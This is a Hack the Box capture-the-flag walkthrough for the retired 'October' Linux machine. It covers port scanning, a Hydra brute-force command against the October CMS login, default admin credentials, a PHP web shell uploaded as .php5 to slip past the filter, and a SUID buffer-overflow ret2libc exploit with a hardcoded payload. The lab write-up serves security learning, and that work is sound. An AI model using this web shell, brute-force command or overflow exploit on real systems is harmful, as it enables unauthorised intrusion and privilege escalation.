Hack the Box – October Walkthrough

Today we’re going to solve another CTF machine “October”. It is now a retired box and can be accessible if you’re a VIP member.



  • Target OS: Linux
  • Services: HTTP, SSH
  • IP Address:
  • Difficulty: Medium


  • Default CMS Credentials
  • Binary SUID BOF


  • Getting user
  • Getting root

Table of Contents


Ports Scanning

Enumerate Directories

Brute Force Using Hydra

Brute Force Using Burp Suite

Reverse Shell

Privilege Escalation


As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have an Apache running and banner says that we have an October CMS installed let’s take a look at it.

Enumerate Directories

Dirbuster revels us a directory which we can login as administrator /backend

Now that we have found our admin login page. We can do brute-force attack, SQL Injection, etc…

But before every-time let’s try searching for exploits first. In that case we’re gonna use searchsploit.

searchsploit -x php/webapps/41936.txt
Exploit: October CMS 1.0.412 - Multiple Vulnerabilities
    URL: https://www.exploit-db.com/exploits/41936/
   Path: /usr/share/exploitdb/platforms/php/webapps/41936.txt

Brute Force Using Hydra

Let’s brute force our way into October CMS using hydra.

Post Request:

POST /backend/backend/auth/signin HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 139

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/backend/backend/[35/395]
nin/:login=^USER^&password=^PASS^:Bad Login" -t 64 -w 30 -o hydra-http-post-attack.txt -I


Hydra never works for me. :confused: I don’t know why? Maybe that’s because of due to sessions and cookies? If i’m missing something please let me know in the comment.


Brute Force Using Burp Suite

Using burp suite i was able to brute force the login. If you also google about October CMS default credentials you can easily find on google as admin:admin

Reverse Shell

Since we have an access to admin panel we can find a way to get reverse shell. If you navigate to Media > Upload then you can try uploading payloads to get reverse shell.

If you reach the exploit which we found using searchsploit there’s a way to upload a reverse shell using .php5 extension which will help us to bypass filter.


< pre >< ?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?>< / pre>

After uploading we can access our shell here.

Now we can use netcat to spawn a reverse shell. I checked every shell but i found perl installed on server.

I used perl reverse shell and did url encode to make it work.

And got shell on terminal.

Privilege Escalation

It’s time to get root.txt now we can use privilege escalation scripts to gather information or we can do some research manually first to save our time.

I manually searched for SUID files and came across one because i saw that file as uncommon file that got my eye.

find / -user root -perm -4000 -print 2>/dev/null

How to be sure of uncommon file?

I knew it was uncommon but to still be sure cd to that directory first.

cd /usr/local/bin
$ ls -lAH
ls -lAH
total 8
-rwsr-xr-x 1 root root 7377 Apr 21  2017 ovrflw
file ovrflw
ovrflw: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=004cdf754281f7f7a05452ea6eaf1ee9014f07da, not stripped

Let’s download this file to our local machine and do some experiments with it.

We’re gonna use Netcat in order to transfer file.

Let’s open this file and take a look at assembly code.

At line +67 we have a strcpy function which is vulnerable to buffer overflow.

We’ll create a random strings data in order to test buffer overflow.

In gdb we have to run this and capture the output.

Now just type r. It will run what we created and give us the breakpoint 0x41384141.

Now search for our pattern offset and we’ll have our EIP register where it is overwritten.

Now we know our offset is 112. Now let’s try to exploit it on our local machine.

Let’s run our gdb again.

Now break the program at main.

As we know the ASLR is off in this file, or we can verify it by running it again and check the system address again if the address is different then we would know that it has ASLR enabled let’s check.

As you can see when run the program 2 times and the system address is same that’s how we can verify that it has no ASLR, now let’s try to get shell from it.

First we will find a same patter address which can be used with both libc_system and /bin/sh, We need to find bin/sh address because that will point our system address to /bin/sh to get a shell, So try this

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "\x10\x73\x58\xb7" + "ZZZZ" + "\xac\x9b\x6a\xb7"');done